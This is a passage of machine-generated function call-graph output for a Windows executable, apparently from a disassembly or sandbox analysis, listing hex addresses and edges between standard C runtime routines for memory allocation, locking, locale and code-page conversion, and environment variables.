18547 40b8ec 18537->18547 18549 40d2e3 _malloc 6 API calls 18537->18549 18550 40b8f1 18537->18550 18552 40b8f8 18537->18552 18553 40b7fe 18537->18553 18539 40b906 18538->18539 18541 40bfc1 __commit 62 API calls 18539->18541 18540 40ec4d __FF_MSGBANNER 62 API calls 18540->18546 18541->18552 18543 40eaa2 __NMSG_WRITE 62 API calls 18543->18546 18544->18537 18545 40e7ee _malloc 4 API calls 18545->18546 18546->18537 18546->18540 18546->18543 18546->18545 18548 40bfc1 __commit 62 API calls 18547->18548 18548->18550 18549->18537 18551 40bfc1 __commit 62 API calls 18550->18551 18551->18552 18552->18448 18554 40b80a __commit 18553->18554 18555 40b83b __commit 18554->18555 18556 40d6e0 __lock 63 API calls 18554->18556 18555->18537 18557 40b820 18556->18557 18558 40def2 ___sbh_alloc_block 5 API calls 18557->18558 18559 40b82b 18558->18559 18561 40b844 18559->18561 18564 40d606 LeaveCriticalSection 18561->18564 18563 40b84b 18563->18555 18564->18563 18565->18452 18567 40daa0 HeapAlloc 18566->18567 18568 40da6c HeapReAlloc 18566->18568 18569 40da8a 18567->18569 18571 40dac3 VirtualAlloc 18567->18571 18568->18569 18570 40da8e 18568->18570 18569->18338 18570->18567 18571->18569 18572 40dadd HeapFree 18571->18572 18572->18569 18574 40db20 VirtualAlloc 18573->18574 18576 40db67 18574->18576 18576->18341 18577->18344 18578->18277 18597 40d606 LeaveCriticalSection 18579->18597 18581 41066c 18581->18287 18583 4145f0 InterlockedIncrement 18582->18583 18584 4145f3 18582->18584 18583->18584 18585 414600 18584->18585 18586 4145fd InterlockedIncrement 18584->18586 18587 41460a InterlockedIncrement 18585->18587 18588 41460d 18585->18588 18586->18585 18587->18588 18589 414617 InterlockedIncrement 18588->18589 18590 41461a 18588->18590 18589->18590 18591 414633 InterlockedIncrement 18590->18591 18592 414643 InterlockedIncrement 18590->18592 18593 41464e InterlockedIncrement 18590->18593 18591->18590 18592->18590 18593->18290 18598 40d606 LeaveCriticalSection 18594->18598 18596 4106ba 18596->18292 18597->18581 18598->18596 18599->18086 18602 41265c 18600->18602 18604 4126c9 18602->18604 18610 416836 18602->18610 18603 4127c7 18603->18132 18603->18133 18604->18603 18605 416836 73 API calls _parse_cmdline 18604->18605 18605->18604 18607 414474 18606->18607 18608 41447b 18606->18608 18832 4142d1 18607->18832 18608->18126 18613 4167e3 18610->18613 18616 40ec86 18613->18616 18617 40ec99 18616->18617 18621 40ece6 18616->18621 18624 410735 18617->18624 18620 40ecc6 18620->18621 18644 413fcc 18620->18644 18621->18602 18625 4106bc __getptd_noexit 63 API calls 18624->18625 18626 41073d 18625->18626 18627 40ec9e 18626->18627 18628 40e79a __amsg_exit 63 API calls 18626->18628 18627->18620 18629 414738 18627->18629 18628->18627 18630 414744 __commit 18629->18630 18631 410735 __getptd 63 API calls 18630->18631 18632 414749 18631->18632 18633 414777 18632->18633 18635 41475b 18632->18635 18634 40d6e0 __lock 63 API calls 18633->18634 18636 41477e 18634->18636 18637 410735 __getptd 63 API calls 18635->18637 18660 4146fa 18636->18660 18640 414760 18637->18640 18642 41476e __commit 18640->18642 18643 40e79a __amsg_exit 63 API calls 18640->18643 18642->18620 18643->18642 18645 413fd8 __commit 18644->18645 18646 410735 __getptd 63 API calls 18645->18646 18647 413fdd 18646->18647 18648 413fef 18647->18648 18649 40d6e0 __lock 63 API calls 18647->18649 18652 413ffd __commit 18648->18652 18656 40e79a __amsg_exit 63 API calls 18648->18656 18650 41400d 18649->18650 18651 414056 18650->18651 18653 414024 InterlockedDecrement 18650->18653 18654 41403e InterlockedIncrement 18650->18654 18828 414067 18651->18828 18652->18621 18653->18654 18657 41402f 18653->18657 18654->18651 18656->18652 18657->18654 18658 40b6b5 type_info::_Type_info_dtor 63 API calls 18657->18658 18659 41403d 18658->18659 18659->18654 18661 4146fe 18660->18661 18667 414730 18660->18667 18662 4145d2 ___addlocaleref 8 API calls 18661->18662 18661->18667 18663 414711 18662->18663 18663->18667 18671 414661 18663->18671 18668 4147a2 18667->18668 18827 40d606 LeaveCriticalSection 18668->18827 18670 4147a9 18670->18640 18672 414672 InterlockedDecrement 18671->18672 18673 4146f5 18671->18673 18674 414687 InterlockedDecrement 18672->18674 18675 41468a 18672->18675 18673->18667 18685 414489 18673->18685 18674->18675 18676 414694 InterlockedDecrement 18675->18676 18677 414697 18675->18677 18676->18677 18678 4146a1 InterlockedDecrement 18677->18678 18679 4146a4 18677->18679 18678->18679 18680 4146ae InterlockedDecrement 18679->18680 18682 4146b1 18679->18682 18680->18682 18681 4146ca InterlockedDecrement 18681->18682 18682->18681 18683 4146da InterlockedDecrement 18682->18683 18684 4146e5 InterlockedDecrement 18682->18684 18683->18682 18684->18673 18686 41450d 18685->18686 18687 4144a0 18685->18687 18688 41455a 18686->18688 18689 40b6b5 type_info::_Type_info_dtor 63 API calls 18686->18689 18687->18686 18696 40b6b5 type_info::_Type_info_dtor 63 API calls 18687->18696 18698 4144d4 18687->18698 18699 414581 18688->18699 18739 417667 18688->18739 18691 41452e 18689->18691 18693 40b6b5 type_info::_Type_info_dtor 63 API calls 18691->18693 18700 414541 18693->18700 18694 40b6b5 type_info::_Type_info_dtor 63 API calls 18704 414502 18694->18704 18695 4145c6 18705 40b6b5 type_info::_Type_info_dtor 63 API calls 18695->18705 18706 4144c9 18696->18706 18697 40b6b5 type_info::_Type_info_dtor 63 API calls 18697->18699 18701 40b6b5 type_info::_Type_info_dtor 63 API calls 18698->18701 18714 4144f5 18698->18714 18699->18695 18702 40b6b5 63 API calls type_info::_Type_info_dtor 18699->18702 18703 40b6b5 type_info::_Type_info_dtor 63 API calls 18700->18703 18707 4144ea 18701->18707 18702->18699 18708 41454f 18703->18708 18709 40b6b5 type_info::_Type_info_dtor 63 API calls 18704->18709 18710 4145cc 18705->18710 18715 417841 18706->18715 18731 4177fc 18707->18731 18713 40b6b5 type_info::_Type_info_dtor 63 API calls 18708->18713 18709->18686 18710->18667 18713->18688 18714->18694 18716 41784e 18715->18716 18730 4178cb 18715->18730 18717 41785f 18716->18717 18718 40b6b5 type_info::_Type_info_dtor 63 API calls 18716->18718 18719 417871 18717->18719 18720 40b6b5 type_info::_Type_info_dtor 63 API calls 18717->18720 18718->18717 18721 40b6b5 type_info::_Type_info_dtor 63 API calls 18719->18721 18722 417883 18719->18722 18720->18719 18721->18722 18723 40b6b5 type_info::_Type_info_dtor 63 API calls 18722->18723 18727 417895 18722->18727 18723->18727 18724 40b6b5 type_info::_Type_info_dtor 63 API calls 18725 4178a7 18724->18725 18726 4178b9 18725->18726 18728 40b6b5 type_info::_Type_info_dtor 63 API calls 18725->18728 18729 40b6b5 type_info::_Type_info_dtor 63 API calls 18726->18729 18726->18730 18727->18724 18727->18725 18728->18726 18729->18730 18730->18698 18732 417809 18731->18732 18733 41783d 18731->18733 18734 417819 18732->18734 18735 40b6b5 type_info::_Type_info_dtor 63 API calls 18732->18735 18733->18714 18736 41782b 18734->18736 18737 40b6b5 type_info::_Type_info_dtor 63 API calls 18734->18737 18735->18734 18736->18733 18738 40b6b5 type_info::_Type_info_dtor 63 API calls 18736->18738 18737->18736 18738->18733 18740 417678 18739->18740 18826 41457a 18739->18826 18741 40b6b5 type_info::_Type_info_dtor 63 API calls 18740->18741 18742 417680 18741->18742 18743 40b6b5 type_info::_Type_info_dtor 63 API calls 18742->18743 18744 417688 18743->18744 18745 40b6b5 type_info::_Type_info_dtor 63 API calls 18744->18745 18746 417690 18745->18746 18747 40b6b5 type_info::_Type_info_dtor 63 API calls 18746->18747 18748 417698 18747->18748 18749 40b6b5 type_info::_Type_info_dtor 63 API calls 18748->18749 18750 4176a0 18749->18750 18751 40b6b5 type_info::_Type_info_dtor 63 API calls 18750->18751 18752 4176a8 18751->18752 18753 40b6b5 type_info::_Type_info_dtor 63 API calls 18752->18753 18754 4176af 18753->18754 18755 40b6b5 type_info::_Type_info_dtor 63 API calls 18754->18755 18756 4176b7 18755->18756 18757 40b6b5 type_info::_Type_info_dtor 63 API calls 18756->18757 18758 4176bf 18757->18758 18759 40b6b5 type_info::_Type_info_dtor 63 API calls 18758->18759 18760 4176c7 18759->18760 18761 40b6b5 type_info::_Type_info_dtor 63 API calls 18760->18761 18762 4176cf 18761->18762 18763 40b6b5 type_info::_Type_info_dtor 63 API calls 18762->18763 18764 4176d7 18763->18764 18765 40b6b5 type_info::_Type_info_dtor 63 API calls 18764->18765 18766 4176df 18765->18766 18767 40b6b5 type_info::_Type_info_dtor 63 API calls 18766->18767 18768 4176e7 18767->18768 18769 40b6b5 type_info::_Type_info_dtor 63 API calls 18768->18769 18770 4176ef 18769->18770 18771 40b6b5 type_info::_Type_info_dtor 63 API calls 18770->18771 18772 4176f7 18771->18772 18773 40b6b5 type_info::_Type_info_dtor 63 API calls 18772->18773 18774 417702 18773->18774 18775 40b6b5 type_info::_Type_info_dtor 63 API calls 18774->18775 18776 41770a 18775->18776 18777 40b6b5 type_info::_Type_info_dtor 63 API calls 18776->18777 18778 417712 18777->18778 18779 40b6b5 type_info::_Type_info_dtor 63 API calls 18778->18779 18780 41771a 18779->18780 18781 40b6b5 type_info::_Type_info_dtor 63 API calls 18780->18781 18782 417722 18781->18782 18783 40b6b5 type_info::_Type_info_dtor 63 API calls 18782->18783 18784 41772a 18783->18784 18785 40b6b5 type_info::_Type_info_dtor 63 API calls 18784->18785 18786 417732 18785->18786 18787 40b6b5 type_info::_Type_info_dtor 63 API calls 18786->18787 18788 41773a 18787->18788 18789 40b6b5 type_info::_Type_info_dtor 63 API calls 18788->18789 18790 417742 18789->18790 18791 40b6b5 type_info::_Type_info_dtor 63 API calls 18790->18791 18792 41774a 18791->18792 18793 40b6b5 type_info::_Type_info_dtor 63 API calls 18792->18793 18794 417752 18793->18794 18795 40b6b5 type_info::_Type_info_dtor 63 API calls 18794->18795 18796 41775a 18795->18796 18797 40b6b5 type_info::_Type_info_dtor 63 API calls 18796->18797 18798 417762 18797->18798 18799 40b6b5 type_info::_Type_info_dtor 63 API calls 18798->18799 18800 41776a 18799->18800 18801 40b6b5 type_info::_Type_info_dtor 63 API calls 18800->18801 18802 417772 18801->18802 18803 40b6b5 type_info::_Type_info_dtor 63 API calls 18802->18803 18804 41777a 18803->18804 18805 40b6b5 type_info::_Type_info_dtor 63 API calls 18804->18805 18806 417788 18805->18806 18807 40b6b5 type_info::_Type_info_dtor 63 API calls 18806->18807 18808 417793 18807->18808 18809 40b6b5 type_info::_Type_info_dtor 63 API calls 18808->18809 18810 41779e 18809->18810 18811 40b6b5 type_info::_Type_info_dtor 63 API calls 18810->18811 18812 4177a9 18811->18812 18813 40b6b5 type_info::_Type_info_dtor 63 API calls 18812->18813 18814 4177b4 18813->18814 18815 40b6b5 type_info::_Type_info_dtor 63 API calls 18814->18815 18816 4177bf 18815->18816 18817 40b6b5 type_info::_Type_info_dtor 63 API calls 18816->18817 18818 4177ca 18817->18818 18819 40b6b5 type_info::_Type_info_dtor 63 API calls 18818->18819 18820 4177d5 18819->18820 18821 40b6b5 type_info::_Type_info_dtor 63 API calls 18820->18821 18822 4177e0 18821->18822 18823 40b6b5 type_info::_Type_info_dtor 63 API calls 18822->18823 18824 4177eb 18823->18824 18825 40b6b5 type_info::_Type_info_dtor 63 API calls 18824->18825 18825->18826 18826->18697 18827->18670 18831 40d606 LeaveCriticalSection 18828->18831 18830 41406e 18830->18648 18831->18830 18833 4142dd __commit 18832->18833 18834 410735 __getptd 63 API calls 18833->18834 18835 4142e6 18834->18835 18836 413fcc _LocaleUpdate::_LocaleUpdate 65 API calls 18835->18836 18837 4142f0 18836->18837 18863 414070 18837->18863 18840 411c75 __malloc_crt 63 API calls 18841 414311 18840->18841 18842 414430 __commit 18841->18842 18870 4140ec 18841->18870 18842->18608 18845 414341 InterlockedDecrement 18847 414351 18845->18847 18848 414362 InterlockedIncrement 18845->18848 18846 41443d 18846->18842 18850 414450 18846->18850 18851 40b6b5 type_info::_Type_info_dtor 63 API calls 18846->18851 18847->18848 18853 40b6b5 type_info::_Type_info_dtor 63 API calls 18847->18853 18848->18842 18849 414378 18848->18849 18849->18842 18854 40d6e0 __lock 63 API calls 18849->18854 18852 40bfc1 __commit 63 API calls 18850->18852 18851->18850 18852->18842 18855 414361 18853->18855 18857 41438c InterlockedDecrement 18854->18857 18855->18848 18858 414408 18857->18858 18859 41441b InterlockedIncrement 18857->18859 18858->18859 18861 40b6b5 type_info::_Type_info_dtor 63 API calls 18858->18861 18880 414432 18859->18880 18862 41441a 18861->18862 18862->18859 18864 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 18863->18864 18865 414084 18864->18865 18866 4140ad 18865->18866 18867 41408f GetOEMCP 18865->18867 18868 4140b2 GetACP 18866->18868 18869 41409f 18866->18869 18867->18869 18868->18869 18869->18840 18869->18842 18871 414070 getSystemCP 75 API calls 18870->18871 18872 41410c 18871->18872 18873 414117 setSBCS 18872->18873 18875 41415b IsValidCodePage 18872->18875 18879 414180 _memset __setmbcp_nolock 18872->18879 18874 40ce09 __atodbl_l 5 API calls 18873->18874 18876 4142cf 18874->18876 18875->18873 18877 41416d GetCPInfo 18875->18877 18876->18845 18876->18846 18877->18873 18877->18879 18883 413e39 GetCPInfo 18879->18883 19016 40d606 LeaveCriticalSection 18880->19016 18882 414439 18882->18842 18884 413e6d _memset 18883->18884 18885 413f1f 18883->18885 18893 417625 18884->18893 18888 40ce09 __atodbl_l 5 API calls 18885->18888 18890 413fca 18888->18890 18890->18879 18892 417426 ___crtLCMapStringA 98 API calls 18892->18885 18894 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 18893->18894 18895 417638 18894->18895 18903 41746b 18895->18903 18898 417426 18899 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 18898->18899 18900 417439 18899->18900 18969 417081 18900->18969 18904 4174b7 18903->18904 18905 41748c GetStringTypeW 18903->18905 18906 4174a4 18904->18906 18908 41759e 18904->18908 18905->18906 18907 4174ac GetLastError 18905->18907 18909 4174f0 MultiByteToWideChar 18906->18909 18926 417598 18906->18926 18907->18904 18931 417a20 GetLocaleInfoA 18908->18931 18915 41751d 18909->18915 18909->18926 18911 40ce09 __atodbl_l 5 API calls 18913 413eda 18911->18913 18913->18898 18914 4175ef GetStringTypeA 18918 41760a 18914->18918 18914->18926 18919 417532 _memset ___convertcp 18915->18919 18920 40b84d _malloc 63 API calls 18915->18920 18917 41756b MultiByteToWideChar 18922 417581 GetStringTypeW 18917->18922 18923 417592 18917->18923 18924 40b6b5 type_info::_Type_info_dtor 63 API calls 18918->18924 18919->18917 18919->18926 18920->18919 18922->18923 18927 4147ae 18923->18927 18924->18926 18926->18911 18928 4147ba 18927->18928 18929 4147cb 18927->18929 18928->18929 18930 40b6b5 type_info::_Type_info_dtor 63 API calls 18928->18930 18929->18926 18930->18929 18932 417a53 18931->18932 18933 417a4e 18931->18933 18962 416f54 18932->18962 18935 40ce09 __atodbl_l 5 API calls 18933->18935 18936 4175c2 18935->18936 18936->18914 18936->18926 18937 417a69 18936->18937 18938 417aa9 GetCPInfo 18937->18938 18942 417b33 18937->18942 18939 417ac0 18938->18939 18940 417b1e MultiByteToWideChar 18938->18940 18939->18940 18943 417ac6 GetCPInfo 18939->18943 18940->18942 18946 417ad9 _strlen 18940->18946 18941 40ce09 __atodbl_l 5 API calls 18945 4175e3 18941->18945 18942->18941 18943->18940 18944 417ad3 18943->18944 18944->18940 18944->18946 18945->18914 18945->18926 18947 40b84d _malloc 63 API calls 18946->18947 18948 417b0b _memset ___convertcp 18946->18948 18947->18948 18948->18942 18949 417b68 MultiByteToWideChar 18948->18949 18950 417b80 18949->18950 18951 417b9f 18949->18951 18953 417ba4 18950->18953 18954 417b87 WideCharToMultiByte 18950->18954 18952 4147ae __freea 63 API calls 18951->18952 18952->18942 18955 417bc3 18953->18955 18956 417baf WideCharToMultiByte 18953->18956 18954->18951 18957 411cba __calloc_crt 63 API calls 18955->18957 18956->18951 18956->18955 18958 417bcb 18957->18958 18958->18951 18959 417bd4 WideCharToMultiByte 18958->18959 18959->18951 18960 417be6 18959->18960 18961 40b6b5 type_info::_Type_info_dtor 63 API calls 18960->18961 18961->18951 18965 41a354 18962->18965 18966 41a36d 18965->18966 18967 41a125 strtoxl 87 API calls 18966->18967 18968 416f65 18967->18968 18968->18933 18970 4170a2 LCMapStringW 18969->18970 18974 4170bd 18969->18974 18971 4170c5 GetLastError 18970->18971 18970->18974 18971->18974 18972 4172bb 18977 417a20 ___ansicp 87 API calls 18972->18977 18973 417117 18975 4172b2 18973->18975 18976 417130 MultiByteToWideChar 18973->18976 18974->18972 18974->18973 18978 40ce09 __atodbl_l 5 API calls 18975->18978 18976->18975 18984 41715d 18976->18984 18979 4172e3 18977->18979 18980 413efa 18978->18980 18979->18975 18981 4173d7 LCMapStringA 18979->18981 18982 4172fc 18979->18982 18980->18892 19015 417333 18981->19015 18985 417a69 ___convertcp 70 API calls 18982->18985 18983 4171ae MultiByteToWideChar 18986 4171c7 LCMapStringW 18983->18986 19012 4172a9 18983->19012 18988 40b84d _malloc 63 API calls 18984->18988 18995 417176 ___convertcp 18984->18995 18989 41730e 18985->18989 18991 4171e8 18986->18991 18986->19012 18987 4173fe 18987->18975 18996 40b6b5 type_info::_Type_info_dtor 63 API calls 18987->18996 18988->18995 18989->18975 18993 417318 LCMapStringA 18989->18993 18990 4147ae __freea 63 API calls 18990->18975 18994 4171f1 18991->18994 18997 41721a 18991->18997 18992 40b6b5 type_info::_Type_info_dtor 63 API calls 18992->18987 18998 41733a 18993->18998 18993->19015 18999 417203 LCMapStringW 18994->18999 18994->19012 18995->18975 18995->18983 18996->18975 19002 40b84d _malloc 63 API calls 18997->19002 19007 417235 ___convertcp 18997->19007 19000 41734b _memset ___convertcp 18998->19000 19003 40b84d _malloc 63 API calls 18998->19003 18999->19012 19006 417389 LCMapStringA 19000->19006 19000->19015 19001 417269 LCMapStringW 19004 417281 WideCharToMultiByte 19001->19004 19005 4172a3 19001->19005 19002->19007 19003->19000 19004->19005 19008 4147ae __freea 63 API calls 19005->19008 19009 4173a5 19006->19009 19010 4173a9 19006->19010 19007->19001 19007->19012 19008->19012 19014 4147ae __freea 63 API calls 19009->19014 19013 417a69 ___convertcp 70 API calls 19010->19013 19012->18990 19013->19009 19014->19015 19015->18987 19015->18992 19016->18882 19018 41358c 19017->19018 19019 41046e __encode_pointer 6 API calls 19018->19019 19020 4135a4 19018->19020 19019->19018 19020->18156 19024 40d281 19021->19024 19023 40d2ca 19023->18158 19025 40d28d __commit 19024->19025 19032 40e806 19025->19032 19031 40d2ae __commit 19031->19023 19033 40d6e0 __lock 63 API calls 19032->19033 19034 40d292 19033->19034 19035 40d196 19034->19035 19036 4104e9 __decode_pointer 6 API calls 19035->19036 19037 40d1aa 19036->19037 19038 4104e9 __decode_pointer 6 API calls 19037->19038 19039 40d1ba 19038->19039 19049 40d23d 19039->19049 19055 40e56a 19039->19055 19041 40d224 19042 41046e __encode_pointer 6 API calls 19041->19042 19043 40d232 19042->19043 19046 41046e __encode_pointer 6 API calls 19043->19046 19044 40d1fc 19048 411d06 __realloc_crt 73 API calls 19044->19048 19044->19049 19050 40d212 19044->19050 19045 40d1d8 19045->19041 19045->19044 19068 411d06 19045->19068 19046->19049 19048->19050 19052 40d2b7 19049->19052 19050->19049 19051 41046e __encode_pointer 6 API calls 19050->19051 19051->19041 19117 40e80f 19052->19117 19056 40e576 __commit 19055->19056 19057 40e5a3 19056->19057 19058 40e586 19056->19058 19060 40e5e4 HeapSize 19057->19060 19063 40d6e0 __lock 63 API calls 19057->19063 19059 40bfc1 __commit 63 API calls 19058->19059 19062 40e58b 19059->19062 19061 40e59b __commit 19060->19061 19061->19045 19064 40e744 __commit 6 API calls 19062->19064 19065 40e5b3 ___sbh_find_block 19063->19065 19064->19061 19073 40e604 19065->19073 19070 411d0f 19068->19070 19071 411d4e 19070->19071 19072 411d2f Sleep 19070->19072 19077 40e34f 19070->19077 19071->19044 19072->19070 19076 40d606 LeaveCriticalSection 19073->19076 19075 40e5df 19075->19060 19075->19061 19076->19075 19078 40e35b __commit 19077->19078 19079 40e370 19078->19079 19080 40e362 19078->19080 19081 40e383 19079->19081 19082 40e377 19079->19082 19083 40b84d _malloc 63 API calls 19080->19083 19090 40e4f5 19081->19090 19111 40e390 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 19081->19111 19084 40b6b5 type_info::_Type_info_dtor 63 API calls 19082->19084 19110 40e36a __commit _realloc 19083->19110 19084->19110 19085 40e528 19086 40d2e3 _malloc 6 API calls 19085->19086 19089 40e52e 19086->19089 19087 40d6e0 __lock 63 API calls 19087->19111 19088 40e4fa HeapReAlloc 19088->19090 19088->19110 19092 40bfc1 __commit 63 API calls 19089->19092 19090->19085 19090->19088 19091 40e54c 19090->19091 19093 40d2e3 _malloc 6 API calls 19090->19093 19095 40e542 19090->19095 19094 40bfc1 __commit 63 API calls 19091->19094 19091->19110 19092->19110 19093->19090 19096 40e555 GetLastError 19094->19096 19098 40bfc1 __commit 63 API calls 19095->19098 19096->19110 19099 40e4c3 19098->19099 19101 40e4c8 GetLastError 19099->19101 19099->19110 19100 40e41b HeapAlloc 19100->19111 19101->19110 19102 40e470 HeapReAlloc 19102->19111 19103 40def2 ___sbh_alloc_block 5 API calls 19103->19111 19104 40e4db 19106 40bfc1 __commit 63 API calls 19104->19106 19104->19110 19105 40d2e3 _malloc 6 API calls 19105->19111 19108 40e4e8 19106->19108 19107 40e4be 19109 40bfc1 __commit 63 API calls 19107->19109 19108->19096 19108->19110 19109->19099 19110->19070 19111->19085 19111->19087 19111->19100 19111->19102 19111->19103 19111->19104 19111->19105 19111->19107 19111->19110 19112 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 19111->19112 19113 40e493 19111->19113 19112->19111 19116 40d606 LeaveCriticalSection 19113->19116 19115 40e49a 19115->19111 19116->19115 19120 40d606 LeaveCriticalSection 19117->19120 19119 40d2bc 19119->19031 19120->19119 19124 40b9aa __commit _strnlen 19121->19124 19122 40b9b8 19123 40bfc1 __commit 63 API calls 19122->19123 19125 40b9bd 19123->19125 19124->19122 19127 40b9ec 19124->19127 19126 40e744 __commit 6 API calls 19125->19126 19131 40b9cd __commit 19126->19131 19128 40d6e0 __lock 63 API calls 19127->19128 19129 40b9f3 19128->19129 19178 40b917 19129->19178 19131->18162 19135 4017cc ___crtGetEnvironmentStringsA 19134->19135 19135->18166 19138 40af70 19136->19138 19137 40b84d _malloc 63 API calls 19137->19138 19138->19137 19139 40af8a 19138->19139 19140 40d2e3 _malloc 6 API calls 19138->19140 19143 40af8c std::bad_alloc::bad_alloc 19138->19143 19139->18171 19140->19138 19141 40afb2 19392 40af49 19141->19392 19143->19141 19145 40d2bd __cinit 74 API calls 19143->19145 19145->19141 19147 40afca 19149 401903 lstrlenA 19148->19149 19150 4018fc 19148->19150 19404 4017e0 19149->19404 19150->18193 19153 401940 GetLastError 19155 40194b MultiByteToWideChar 19153->19155 19156 40198d 19153->19156 19154 401996 19154->18193 19157 4017e0 78 API calls 19155->19157 19156->19154 19420 401030 GetLastError 19156->19420 19158 401970 MultiByteToWideChar 19157->19158 19158->19156 19161 40af66 75 API calls 19160->19161 19162 40187c 19161->19162 19163 401885 SysAllocString 19162->19163 19164 4018a4 19162->19164 19163->19164 19164->18195 19166 40231a SafeArrayUnaccessData 19165->19166 19166->18202 19168 4019aa InterlockedDecrement 19167->19168 19173 4019df VariantClear 19167->19173 19169 4019b8 19168->19169 19168->19173 19170 4019c2 SysFreeString 19169->19170 19171 4019c9 19169->19171 19169->19173 19170->19171 19429 40aec0 19171->19429 19173->18210 19175 401571 19174->19175 19177 401582 19174->19177 19435 40afe0 19175->19435 19177->18174 19179 40b930 19178->19179 19180 40b92c 19178->19180 19179->19180 19182 40b942 _strlen 19179->19182 19187 40eeab 19179->19187 19184 40ba18 19180->19184 19182->19180 19197 40edfb 19182->19197 19391 40d606 LeaveCriticalSection 19184->19391 19186 40ba1f 19186->19131 19190 40eec6 19187->19190 19195 40ef2b 19187->19195 19188 40eecc WideCharToMultiByte 19188->19190 19188->19195 19189 411cba __calloc_crt 63 API calls 19189->19190 19190->19188 19190->19189 19191 40eeef WideCharToMultiByte 19190->19191 19190->19195 19196 40b6b5 type_info::_Type_info_dtor 63 API calls 19190->19196 19200 414d44 19190->19200 19191->19190 19192 40ef37 19191->19192 19193 40b6b5 type_info::_Type_info_dtor 63 API calls 19192->19193 19193->19195 19195->19182 19196->19190 19292 40ed0d 19197->19292 19201 414d76 19200->19201 19202 414d59 19200->19202 19204 414dd4 19201->19204 19246 417e7e 19201->19246 19203 40bfc1 __commit 63 API calls 19202->19203 19205 414d5e 19203->19205 19206 40bfc1 __commit 63 API calls 19204->19206 19208 40e744 __commit 6 API calls 19205->19208 19235 414d6e 19206->19235 19208->19235 19210 414db5 19212 414e12 19210->19212 19213 414de7 19210->19213 19214 414dcb 19210->19214 19212->19235 19257 414c98 19212->19257 19216 411c75 __malloc_crt 63 API calls 19213->19216 19213->19235 19217 40eeab ___wtomb_environ 120 API calls 19214->19217 19219 414df7 19216->19219 19220 414dd0 19217->19220 19219->19212 19226 411c75 __malloc_crt 63 API calls 19219->19226 19219->19235 19220->19204 19220->19212 19221 414e8f 19223 414f7a 19221->19223 19227 414e98 19221->19227 19222 414e41 19225 40b6b5 type_info::_Type_info_dtor 63 API calls 19222->19225 19224 40b6b5 type_info::_Type_info_dtor 63 API calls 19223->19224 19224->19235 19230 414e4b 19225->19230 19226->19212 19228 411d54 __recalloc_crt 74 API calls 19227->19228 19227->19235 19231 414e51 _strlen 19228->19231 19229 414f5e 19233 40b6b5 type_info::_Type_info_dtor 63 API calls 19229->19233 19229->19235 19230->19231 19261 411d54 19230->19261 19231->19229 19234 411cba __calloc_crt 63 API calls 19231->19234 19231->19235 19233->19235 19236 414efb _strlen 19234->19236 19235->19190 19236->19229 19237 40ef42 _strcpy_s 63 API calls 19236->19237 19238 414f14 19237->19238 19239 414f28 SetEnvironmentVariableA 19238->19239 19240 40e61c __invoke_watson 10 API calls 19238->19240 19241 414f49 19239->19241 19242 414f52 19239->19242 19243 414f25 19240->19243 19244 40bfc1 __commit 63 API calls 19241->19244 19245 40b6b5 type_info::_Type_info_dtor 63 API calls 19242->19245 19243->19239 19244->19242 19245->19229 19266 417dc2 19246->19266 19248 414d89 19248->19204 19248->19210 19249 414cea 19248->19249 19250 414cfb 19249->19250 19254 414d3b 19249->19254 19251 411cba __calloc_crt 63 API calls 19250->19251 19252 414d12 19251->19252 19253 414d24 19252->19253 19255 40e79a __amsg_exit 63 API calls 19252->19255 19253->19254 19273 417d6d 19253->19273 19254->19210 19255->19253 19258 414ca6 19257->19258 19259 40edfb __fassign 107 API calls 19258->19259 19260 414ccd 19258->19260 19259->19258 19260->19221 19260->19222 19264 411d5d 19261->19264 19263 411da0 19263->19231 19264->19263 19265 411d81 Sleep 19264->19265 19281 40b783 19264->19281 19265->19264 19267 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19266->19267 19268 417dd6 19267->19268 19269 417df4 __mbschr_l 19268->19269 19270 40bfc1 __commit 63 API calls 19268->19270 19269->19248 19271 417de4 19270->19271 19272 40e744 __commit 6 API calls 19271->19272 19272->19269 19274 417d7e _strlen 19273->19274 19280 417d7a 19273->19280 19275 40b84d _malloc 63 API calls 19274->19275 19276 417d91 19275->19276 19277 40ef42 _strcpy_s 63 API calls 19276->19277 19276->19280 19278 417da3 19277->19278 19279 40e61c __invoke_watson 10 API calls 19278->19279 19278->19280 19279->19280 19280->19253 19282 40b792 19281->19282 19283 40b7ba 19281->19283 19282->19283 19284 40b79e 19282->19284 19285 40e56a __msize 64 API calls 19283->19285 19288 40b7cf 19283->19288 19287 40bfc1 __commit 63 API calls 19284->19287 19285->19288 19286 40e34f _realloc 72 API calls 19291 40b7b3 _memset 19286->19291 19289 40b7a3 19287->19289 19288->19286 19290 40e744 __commit 6 API calls 19289->19290 19290->19291 19291->19264 19293 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19292->19293 19294 40ed21 19293->19294 19295 40ed42 19294->19295 19297 40ed75 19294->19297 19309 40ed2a 19294->19309 19296 40bfc1 __commit 63 API calls 19295->19296 19298 40ed47 19296->19298 19299 40ed99 19297->19299 19300 40ed7f 19297->19300 19304 40e744 __commit 6 API calls 19298->19304 19302 40eda1 19299->19302 19303 40edb5 19299->19303 19301 40bfc1 __commit 63 API calls 19300->19301 19305 40ed84 19301->19305 19310 414b9e 19302->19310 19330 414b5c 19303->19330 19304->19309 19308 40e744 __commit 6 API calls 19305->19308 19308->19309 19309->19182 19311 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19310->19311 19312 414bb2 19311->19312 19313 414bbb 19312->19313 19314 414bd3 19312->19314 19316 414c06 19312->19316 19313->19309 19315 40bfc1 __commit 63 API calls 19314->19315 19317 414bd8 19315->19317 19318 414c10 19316->19318 19319 414c2a 19316->19319 19322 40e744 __commit 6 API calls 19317->19322 19323 40bfc1 __commit 63 API calls 19318->19323 19320 414c34 19319->19320 19321 414c49 19319->19321 19335 417c1d 19320->19335 19325 414b5c ___crtCompareStringA 96 API calls 19321->19325 19322->19313 19326 414c15 19323->19326 19327 414c63 19325->19327 19328 40e744 __commit 6 API calls 19326->19328 19327->19313 19329 40bfc1 __commit 63 API calls 19327->19329 19328->19313 19329->19313 19331 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 19330->19331 19332 414b6f 19331->19332 19351 4147ec 19332->19351 19336 417c33 19335->19336 19346 417c58 ___ascii_strnicmp 19335->19346 19337 40ec86 _LocaleUpdate::_LocaleUpdate 73 